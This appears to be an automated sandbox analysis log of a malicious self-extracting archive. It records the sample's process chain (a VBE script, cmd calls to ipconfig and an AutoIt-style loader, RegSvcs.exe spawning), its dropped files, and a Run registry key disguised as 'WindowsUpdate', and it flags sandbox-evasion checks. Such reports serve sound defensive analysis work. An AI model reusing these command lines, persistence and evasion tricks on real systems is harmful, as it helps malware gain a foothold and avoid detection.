                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dll
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc tguujh.msc nhhjmppg.dll
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 80
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc tguujh.msc nhhjmppg.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: dxgidebug.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: uhbrQkYNzx.exeStatic file information: File size 1264257 > 1048576
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: uhbrQkYNzx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: uhbrQkYNzx.exe
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.2027782014.0000000000E60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2027782014.0000000000E60000.00000040.00001000.00020000.00000000.sdmp
                Source: uhbrQkYNzx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: uhbrQkYNzx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: uhbrQkYNzx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: uhbrQkYNzx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: uhbrQkYNzx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C55D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00C55D78
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4847500Jump to behavior
                Source: uhbrQkYNzx.exeStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B6680 push ecx; ret 0_2_009B6693
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B5773 push ecx; ret 0_2_009B5786
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CA0332 push edi; ret 10_2_00CA0333
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C70E06 push ecx; ret 10_2_00C70E19
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C6DC00 push eax; iretd 10_2_00C6DC01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040D17A push ds; retf 15_2_0040D17B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004052D2 push ebx; ret 15_2_004052D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00417A9B push cs; iretd 15_2_00417A9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00403440 push eax; ret 15_2_00403442
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0041EE60 push ebx; iretd 15_2_0041EE69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00414E3E push 00000056h; retf 15_2_00414E47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E6225F pushad ; ret 15_2_00E627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E627FA pushad ; ret 15_2_00E627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E6283D push eax; iretd 15_2_00E62858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E909AD push ecx; mov dword ptr [esp], ecx15_2_00E909B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E61368 push eax; iretd 15_2_00E61369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E69939 push es; iretd 15_2_00E69940
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C10332 push edi; ret 16_2_00C10333
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE0E06 push ecx; ret 16_2_00BE0E19

                Persistence and Installation Behavior

                barindex
                Uses ipconfig to lookup or modify the Windows network settings
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile created: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.mscJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile created: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeFile created: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe.exeJump to dropped file
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile created: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.mscJump to dropped file

                Boot Survival

                barindex
                Creates autostart registry keys with suspicious values (likely registry only malware)
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CE25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00CE25A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C6FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00C6FC8A
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C525A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00C525A0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BDFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00BDFC8A
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM autoit script
                Source: Yara matchFile source: Process Memory Space: tguujh.msc PID: 2056, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: tguujh.msc.exe PID: 5748, type: MEMORYSTR
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_10-101154
